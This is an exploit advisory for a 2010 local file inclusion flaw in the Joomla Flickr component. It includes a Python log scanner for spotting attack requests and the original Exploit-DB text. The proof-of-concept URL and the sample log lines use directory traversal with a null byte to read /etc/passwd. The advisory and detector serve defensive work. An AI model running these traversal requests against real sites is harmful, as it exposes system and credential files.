Vendor: Joomla Component Joomla Flickr
By: AntiSecurity
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: Joomla Component Joomla Flickr
Affected Version From: 1.0.x
Affected Version To: 1.0.x
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Joomla Flickr Local File Inclusion Vulnerability

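A Local File Inclusion (LFI) vulnerability exists in the Joomla Component Joomla Flickr (com_joomlaflickr) version 1.0.x. The affected input is the controller parameter of index.php?option=com_joomlaflickr; the published proof of concept supplies a directory-traversal path ending in a null byte (%00) in that parameter. An attacker can exploit this to include local files on the affected system, which can expose sensitive information or lead to execution of malicious code.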

Mitigation:

Update to the latest version of the Joomla Component Joomla Flickr.
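
Until the update is applied, web server logs can be checked for requests of the kind shown in the advisory. The following is an added example, not part of the original advisory or the component's code: it flags com_joomlaflickr requests whose controller parameter contains traversal segments, a null byte, or other unexpected characters. The log lines are constructed samples, and the rule that legitimate controller names are plain identifiers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: legitimate controller names are plain identifiers.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]+")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2010:10:00:01 +0700] "GET /index.php?option=com_joomlaflickr&controller=photos HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Apr/2010:10:00:09 +0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '198.51.100.7 - - [06/Apr/2010:10:00:12 +0700] "GET /index.php?option=com_joomlaflickr&controller=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 310',
    '192.0.2.10 - - [06/Apr/2010:10:00:20 +0700] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7300',
]

def fully_decode(value, max_rounds=3):
    """Undo layered percent-encoding so encoded traversal is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return findings for one log line; [] if benign or another component."""
    m = REQUEST.search(line)
    if not m:
        return []
    params = dict(parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True))
    if params.get("option") != "com_joomlaflickr" or "controller" not in params:
        return []
    value = fully_decode(params["controller"])
    findings = []
    if "\x00" in value:
        findings.append("null-byte")
    if ".." in value.replace("\\", "/").split("/"):
        findings.append("traversal")
    if not findings and not SAFE_CONTROLLER.fullmatch(value):
        findings.append("unexpected-characters")
    return findings

def scan(lines):
    """Return (line_number, findings) for every suspicious line."""
    hits = [(n, classify(l)) for n, l in enumerate(lines, 1)]
    return [(n, f) for n, f in hits if f]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(f)}")
```

A hit only shows that a request was made; whether it succeeded has to be judged from the response status and size and from the installed component version.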

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability
 
       Software : com_joomlaflickr version 1.0.x
       Vendor   : http://aloiroberto.wordpress.com/software/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia